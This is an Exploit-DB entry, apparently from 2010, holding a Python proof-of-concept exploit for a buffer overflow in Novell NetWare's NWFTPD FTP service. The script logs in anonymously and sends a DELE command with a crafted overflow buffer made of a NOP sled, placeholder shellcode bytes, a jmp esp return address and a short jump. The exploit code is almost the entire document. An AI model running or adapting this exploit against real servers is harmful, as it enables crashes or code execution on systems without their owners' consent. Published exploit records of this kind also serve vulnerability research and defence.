Novell Netware - NWFTPD RMD/RNFR/DELE Argument Parsing Buffer Overflow

EDB-ID:

14928

CVE:

N/A


Author:

Abysssec

Type:

dos


Platform:

Novell

Date:

2010-09-07


'''
 __ __ ____     _  _ ____ 
 | \/ |/ __ \  /\ | | | | _ \ 
 | \ / | | | | / \ | | | | |_) |
 | |\/| | | | |/ /\ \| | | | _ < Day 7 - (Binary Analysis)
 | | | | |__| / ____ \ |__| | |_) |
 |_| |_|\____/_/  \_\____/|____/ 

 http://www.exploit-db.com/moaub-7-novell-netware-nwftpd-rmdrnfrdele-argument-parsing-buffer-overflow/
'''

'''
 Title      : Novell Netware NWFTPD RMD/RNFR/DELE Argument Parsing Buffer overflow
 Version     : NWFTPD.NLM 5.09.02 (Netware 6.5 – SP8)
 Analysis     : http://www.abysssec.com
 Vendor      : http://www.Novell.com
 Impact      : Critical
 Contact     : shahin [at] abysssec.com , info [at] abysssec.com
 Twitter     : @abysssec
'''
from ftplib import FTP
import sys

try:
	netwareServerIp = '127.0.0.1'
	ftp = FTP(netwareServerIp) 				
	ftp.login('anonymous','a@a') 
	buffer = "/"
	buffer += "\x90"*107 				#nops
	buffer += "\xcc"*413				#shellcode part2 = 413 byte
	buffer += "\xb9\xa4\xe0\x91"			#EIP - jmp esp from nwftpd.nlm module
	buffer += "\xcc"*124				#shellcode part1 = 124 byte
	buffer += "\x08\xeb\x90\x90\x90\x90" 		#short jmp to shellcode part2 
	ftp.voidcmd('DELE ' + buffer) 
	
except Exception,err:
	print err